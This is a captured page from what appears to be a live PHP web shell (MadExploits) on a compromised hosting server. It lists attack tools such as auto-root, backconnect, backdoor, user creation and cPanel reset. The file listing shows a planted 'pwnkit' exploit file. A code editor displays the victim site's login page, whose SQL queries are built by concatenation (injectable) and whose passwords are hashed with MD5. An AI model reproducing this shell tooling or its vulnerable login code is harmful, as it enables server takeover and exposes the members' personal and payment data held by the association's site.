Linux server.hostify.co.in 5.14.0-611.49.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Apr 21 16:39:08 EDT 2026 x86_64
Apache
: 162.214.74.213 | : 216.73.217.79
438 Domain
8.2.31
orangegroceries
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
orangegroceries /
public_html /
tjra.in /
[ HOME SHELL ]
Name
Size
Permission
Action
.well-known
[ DIR ]
drwxr-xr-x
admin-jurep
[ DIR ]
drwxr-xr-x
assets
[ DIR ]
drwxr-xr-x
blog
[ DIR ]
drwxr-xr-x
cgi-bin
[ DIR ]
drwxr-xr-x
htfile
[ DIR ]
drwxr-xr-x
includes
[ DIR ]
drwxr-xr-x
qr-code
[ DIR ]
drwxr-xr-x
qrfile
[ DIR ]
drwxr-xr-x
state-committee
[ DIR ]
drwxr-xr-x
telangana--state-unit
[ DIR ]
drwxr-xr-x
.htaccess
281
B
-rw-r--r--
about-us.php
3.35
KB
-rw-r--r--
achievements.php
2.53
KB
-rw-r--r--
adminer.php
465.43
KB
-rw-r--r--
become-a-member.php
8.62
KB
-rw-r--r--
blog-detail.php
10.05
KB
-rw-r--r--
blog.php
8.35
KB
-rw-r--r--
blog_enquiry.php
2.04
KB
-rw-r--r--
contact-us.php
9.69
KB
-rw-r--r--
delete_member.php
269
B
-rw-r--r--
direct-bank-account.php
7.01
KB
-rw-r--r--
edit-profile.php
20.74
KB
-rw-r--r--
faq.php
11.39
KB
-rw-r--r--
forgot-password.php
7
KB
-rw-r--r--
gallery-detail.php
3.84
KB
-rw-r--r--
google559cbc7861e1a83d.html
53
B
-rw-r--r--
index.php
12.45
KB
-rw-r--r--
login.php
6.37
KB
-rw-r--r--
logout.php
155
B
-rw-r--r--
mahila-women.php
3.51
KB
-rw-r--r--
member-details.php
3.82
KB
-rw-r--r--
membership.php
8.38
KB
-rw-r--r--
my-booking.php
8.49
KB
-rw-r--r--
my-certificate.php
16.27
KB
-rw-r--r--
my-idcard - Copy.php
22.1
KB
-rw-r--r--
my-idcard.php
23.34
KB
-rw-r--r--
my-idcard2.php
9.07
KB
-rw-r--r--
my-idcard3.php
8.27
KB
-rw-r--r--
my-profile.php
10.98
KB
-rw-r--r--
nris-welfare-and-support.php
6.01
KB
-rw-r--r--
offline-payment.php
5.24
KB
-rw-r--r--
payment.php
6.02
KB
-rw-r--r--
photo-gallery.php
5.12
KB
-rw-r--r--
pwnkit
10.99
KB
-rw-r--r--
reg_validation.php
1.19
KB
-rw-r--r--
register.php
21.81
KB
-rw-r--r--
registration-charge.php
4.15
KB
-rw-r--r--
robots.txt
66
B
-rw-r--r--
service-details.php
3.4
KB
-rw-r--r--
tjra-objective.php
2.78
KB
-rw-r--r--
video-gallery.php
2.61
KB
-rw-r--r--
video.php
2.61
KB
-rw-r--r--
view-member-details.php
4.46
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : login.php
<?php include("includes/db_config.php"); if(isset($_POST["login"])) { extract($_POST); $contact_no = $_POST["contact_no"]; $password = md5($_POST["password"]); $mob_no = stripslashes($contact_no); $password = stripslashes($password); $status="Accept"; $sql ="SELECT count(*) as num FROM user_profile WHERE contact_no = '".$mob_no."' AND password = '".$password."' and payment_status='".$status."'"; $result = mysqli_query($conn, $sql) or die(mysqli_error($conn)); $res= mysqli_fetch_array($result); $count=$res['num']; if($count > 0 ) { $_SESSION['loggedin'] = true; //$_SESSION['email'] = $email; //$email_id=$_SESSION['email']; $sql1="select * from user_profile where contact_no='".$mob_no."'"; $result1 = mysqli_query($conn, $sql1); $res1= mysqli_fetch_array($result1); $_SESSION['id']=$res1['id']; echo $user_id=$_SESSION['id']; echo '<script>alert("Login successfully")</script>'; echo "<script>window.location.href='my-profile.php'</script>"; }else{ echo '<script>alert("The username or password are incorrect!")</script>'; } } ?> <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8" /> <meta name="viewport" content="width=device-width, initial-scale=1.0" /> <title>Telangana Journalist Reporter Association</title> <?php include("includes/css.php");?> <link rel="canonical" href="https://www.tjra.in/" /> <meta property="og:locale" content="en_Us" /> <meta property="og:type" content="website" /> <meta property="og:title" content="Telangana Journalist Reporter Association" /> <meta property="og:description" content="Telangana Journalist Reporter Association provides " /> <meta property="og:url" content="https://www.tjra.in//" /> <meta property="og:site_name" content="Telangana Journalist Reporter Association" /> <meta charset="utf-8"> <meta name="keywords" content="" /> <meta name="author" content="Telangana Journalist Reporter Association"> <meta name="description" content="" /> <style> .team-one--about { padding: 100px 0px 100px 0px; } .login-page { padding: 35px 0; } .login-page__wrap { position: relative; padding: 30px; background-color: var(--careox-gray, #f1f6f7);margin: 0px; } .login-page__wrap__title{ color:#b91e4d; text-transform:uppercase;text-align: center } label{font-weight:600} .login-page .careox-btn { width: 100%; } .page-header { padding-top: 10px; padding-bottom:5px; } .page-header__bg { background-image: none; background-color: #fff; } .page-header__bg::before { background-color: #000 } .comments-one__card:not(:first-of-type) { margin-top: 25px; padding-top: 25px; } @media (min-width: 320px) and (max-width: 640px) { .page-header { padding-top:40px; padding-bottom: 5px; } } </style> </head> <body class="custom-cursor"> <div class="custom-cursor__cursor"></div> <div class="custom-cursor__cursor-two"></div> <div class="page-wrapper"> <?php include("includes/header.php");?> <section class="page-header"> <div class="page-header__bg"></div> <div class="container-fluid"> <ul class="careox-breadcrumb list-unstyled"> <li><a href="index.php">Home</a></li> <li><span>Login</span></li> </ul> </div> </section> <section class="login-page" style="background-color:#f5f6f7"> <div class="container-fluid"> <div class="row"> <div class="col-md-4"></div> <div class="col-md-4 login-page__wrap" style="background-color:#fff;border: 1px solid #e8e8e8;"> <h3 class="login-page__wrap__title">Login your Account</h3> <form class="login-page__form" action="" method="post"> <div class="login-page__form-input-box"> <label>Mobile Number :</label> <input type="tel" id="contact_no" name="contact_no" class="contactno-login" placeholder="Enter Registered Mobile Number*" required> <div class="alert alert-warning" id="result" style="display: none;"> </div> <span style="color: red" id="contactno_alert"></span> </div> <div class="login-page__form-input-box"> <label>Password :</label> <input type="password" name="password" placeholder="Password *"> </div> <div class="login-page__check-forgot"> <div class="login-page__checked-box"> <input type="checkbox" name="save-data" id="save-data"> <label for="save-data"><span></span>Remember Me?</label> </div> <div class="login-page__form-forgot-password"> <a href="forgot-password.php">Forgot your Password?</a> </div> </div> <center> <button type="submit" name="login" class="btn btn-sm careox-btn"><span>Login</span></button><br/> <a href="register.php">Don't have any account? Register Here</a> </center> </form> </div> </div> </div> </section> <?php include("includes/newsletter.php");?> </div> <?php include("includes/footer.php");?> <?php include("includes/js.php");?> <script type="text/javascript"> $(document).ready(function(){ $(".contactno-login").keyup(function() { searchid = $(this).val(); dataString = 'searchlg='+ searchid; if(searchid!='') { $.ajax({ type: "POST", url: "reg_validation.php", data: dataString, cache: false, success: function(html) { $("#result").html(html).show(); } }); }return false; }); }); </script> </body> </html>
Close